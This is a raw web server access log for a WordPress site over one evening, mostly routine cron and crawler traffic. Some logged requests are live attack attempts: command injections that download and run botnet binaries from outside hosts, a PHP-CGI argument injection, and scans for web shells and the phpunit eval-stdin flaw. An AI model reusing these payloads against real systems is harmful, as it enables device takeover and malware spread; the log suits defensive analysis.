36.133.115.36 - - [19/Oct/2025:18:22:04 +0800] "POST /wp-cron.php?doing_wp_cron=1760869324.6529710292816162109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
216.180.246.40 - - [19/Oct/2025:18:22:04 +0800] "GET / HTTP/1.1" 301 5 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.40 - - [19/Oct/2025:18:22:40 +0800] "GET /manage/account/login HTTP/1.1" 404 8989 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
36.133.115.36 - - [19/Oct/2025:18:22:57 +0800] "POST /wp-cron.php?doing_wp_cron=1760869377.4955930709838867187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
216.180.246.40 - - [19/Oct/2025:18:22:57 +0800] "GET /admin/index.html HTTP/1.1" 404 8990 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.40 - - [19/Oct/2025:18:23:24 +0800] "GET /index.html HTTP/1.1" 200 8721 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
36.133.115.36 - - [19/Oct/2025:18:40:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760870415.8951048851013183593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.172.103.124 - - [19/Oct/2025:18:40:16 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [19/Oct/2025:18:56:28 +0800] "POST /wp-cron.php?doing_wp_cron=1760871388.7198510169982910156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.130.123 - - [19/Oct/2025:18:56:29 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [19/Oct/2025:19:05:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760871915.6305480003356933593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [19/Oct/2025:19:05:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:19:25:26 +0800] "POST /wp-cron.php?doing_wp_cron=1760873126.7021551132202148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.62.132.25 - - [19/Oct/2025:19:25:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.62.132.25 - - [19/Oct/2025:19:25:28 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [19/Oct/2025:19:36:29 +0800] "POST /wp-cron.php?doing_wp_cron=1760873789.8677670955657958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:19:36:30 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:19:47:51 +0800] "POST /wp-cron.php?doing_wp_cron=1760874471.6160519123077392578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [19/Oct/2025:19:47:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
13.86.70.243 - - [19/Oct/2025:19:50:03 +0800] "GET /.__info.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:03 +0800] "GET /0.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:03 +0800] "GET /07.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:04 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:04 +0800] "GET /123.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:04 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:04 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:05 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:05 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:05 +0800] "GET /adminfuns.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:06 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:06 +0800] "GET /akcc.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:06 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:07 +0800] "GET /asd.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:07 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:07 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:07 +0800] "GET /axx.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:08 +0800] "GET /berax.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:08 +0800] "GET /build.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:08 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:09 +0800] "GET /checkbox.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:09 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:09 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:09 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:10 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:10 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:10 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:11 +0800] "GET /ds.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:11 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:11 +0800] "GET /f5.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:11 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:12 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:12 +0800] "GET /file4.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:12 +0800] "GET /filemanager.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:12 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:13 +0800] "GET /form.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:13 +0800] "GET /gecko.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:13 +0800] "GET /god4m.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:13 +0800] "GET /info.php HTTP/1.1" 200 29 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:14 +0800] "GET /kyami.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:14 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:14 +0800] "GET /manager.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:14 +0800] "GET /mari.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:15 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:15 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:15 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:15 +0800] "GET /sallu.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:16 +0800] "GET /test1.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [19/Oct/2025:19:50:16 +0800] "POST /wp-cron.php?doing_wp_cron=1760874616.7381470203399658203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
13.86.70.243 - - [19/Oct/2025:19:50:16 +0800] "GET /wp-activate.php HTTP/1.1" 302 5 "-" "-"
36.133.115.36 - - [19/Oct/2025:19:50:17 +0800] "POST /wp-cron.php?doing_wp_cron=1760874617.6103758811950683593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
13.86.70.243 - - [19/Oct/2025:19:50:17 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:18 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:18 +0800] "GET /wp-admin.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:18 +0800] "GET /wp-good.php HTTP/1.1" 404 27 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:19 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:20 +0800] "GET /xmlrpc.php HTTP/1.1" 405 53 "-" "-"
13.86.70.243 - - [19/Oct/2025:19:50:20 +0800] "GET /xmrlpc.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [19/Oct/2025:19:52:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760874738.2803940773010253906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [19/Oct/2025:19:52:19 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:20:02:41 +0800] "POST /wp-cron.php?doing_wp_cron=1760875361.2293989658355712890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.153.34.54 - - [19/Oct/2025:20:02:42 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
185.222.58.241 - - [19/Oct/2025:20:14:14 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
36.133.115.36 - - [19/Oct/2025:20:29:29 +0800] "POST /wp-cron.php?doing_wp_cron=1760876969.2762639522552490234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.181.108.104 - - [19/Oct/2025:20:29:29 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 20936 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [19/Oct/2025:20:40:39 +0800] "POST /wp-cron.php?doing_wp_cron=1760877639.4853889942169189453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.55.230.134 - - [19/Oct/2025:20:40:39 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.55.230.134:41390/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [19/Oct/2025:20:59:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760878755.2150781154632568359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
193.174.89.19 - - [19/Oct/2025:20:59:15 +0800] "GET /fhir-server/api/v4/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:15 +0800] "GET /baseR3/metadata HTTP/1.1" 499 0 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /baseDstu3/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /baseR2/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /r5/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /fhir/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /r4/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /r3/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /baseDstu2/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:16 +0800] "GET /fhir-server/api/v4/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:17 +0800] "GET /metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:17 +0800] "GET /r2/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:17 +0800] "GET /baseR4/metadata HTTP/1.1" 404 31381 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
193.174.89.19 - - [19/Oct/2025:20:59:17 +0800] "GET /baseR5/metadata HTTP/1.1" 499 0 "-" "fhms-its-research-scanner/1.0 (+https://fb02itsscan02.fh-muenster.de)"
36.133.115.36 - - [19/Oct/2025:21:00:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760878825.1664960384368896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
95.168.190.250 - - [19/Oct/2025:21:00:25 +0800] "GET /robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; ORT/v1.0.0; visit ORTc.me )"
95.168.190.250 - - [19/Oct/2025:21:00:26 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; ORT/v1.0.0; visit ORTc.me )"
36.133.115.36 - - [19/Oct/2025:21:10:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760879415.6922769546508789062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.153.34.54 - - [19/Oct/2025:21:10:15 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F23.177.185.39%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 8989 "-" "Mozila/5.0"
36.133.115.36 - - [19/Oct/2025:21:37:38 +0800] "POST /wp-cron.php?doing_wp_cron=1760881058.9323110580444335937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.149.188 - - [19/Oct/2025:21:37:38 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.149.188 - - [19/Oct/2025:21:37:41 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.89.70.31 - - [19/Oct/2025:21:41:50 +0800] "GET / HTTP/1.0" 200 153652 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
45.89.70.31 - - [19/Oct/2025:21:41:51 +0800] "GET /contacts/ HTTP/1.0" 200 76283 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
36.133.115.36 - - [19/Oct/2025:21:41:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760881313.0676729679107666015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.70.31 - - [19/Oct/2025:21:41:54 +0800] "POST /contacts/ HTTP/1.0" 200 68826 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
36.133.115.36 - - [19/Oct/2025:21:51:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760881877.9821929931640625000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.84 - - [19/Oct/2025:21:51:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:22:01:58 +0800] "POST /wp-cron.php?doing_wp_cron=1760882518.6947250366210937500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
60.191.125.35 - - [19/Oct/2025:22:01:58 +0800] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:22:10:45 +0800] "POST /wp-cron.php?doing_wp_cron=1760883045.4989318847656250000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.245.18 - - [19/Oct/2025:22:10:45 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
195.170.172.128 - - [19/Oct/2025:22:11:20 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [19/Oct/2025:22:11:23 +0800] "GET / HTTP/1.1" 200 153674 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - 1GP8z4phw8zuE6n2S3s1XDdyPpjPjukRUg [19/Oct/2025:22:11:28 +0800] "POST / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - 0xb5a27585c68329cc1eb21749caef8332b911fbbf [19/Oct/2025:22:11:32 +0800] "POST / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [19/Oct/2025:22:11:33 +0800] "GET /WuEL HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)"
195.170.172.128 - - [19/Oct/2025:22:11:38 +0800] "GET /a HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [19/Oct/2025:22:11:40 +0800] "GET /download/file.ext HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [19/Oct/2025:22:11:42 +0800] "GET /SiteLoader HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [19/Oct/2025:22:11:45 +0800] "GET /mPlayer HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [19/Oct/2025:22:11:58 +0800] "POST / HTTP/1.1" 400 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
36.133.115.36 - - [19/Oct/2025:22:22:17 +0800] "POST /wp-cron.php?doing_wp_cron=1760883737.3576049804687500000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
116.179.32.145 - - [19/Oct/2025:22:22:17 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2231%2F HTTP/1.1" 200 1296 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [19/Oct/2025:22:43:22 +0800] "POST /wp-cron.php?doing_wp_cron=1760885002.8833780288696289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.27 - - [19/Oct/2025:22:43:23 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [19/Oct/2025:23:10:40 +0800] "POST /wp-cron.php?doing_wp_cron=1760886640.7017779350280761718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.216.150.9 - - [19/Oct/2025:23:10:40 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 5 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.216.150.9 - - [19/Oct/2025:23:10:42 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 31381 "http://36.133.115.36:80/.well-known/security.txt" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [19/Oct/2025:23:37:50 +0800] "POST /wp-cron.php?doing_wp_cron=1760888270.2952880859375000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.171.29.151 - - [19/Oct/2025:23:37:50 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:52 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:52 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:52 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:53 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:53 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:53 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:53 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:54 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:54 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:54 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:54 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:55 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:55 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:55 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:55 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:56 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:56 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:59 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:59 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:59 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:37:59 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
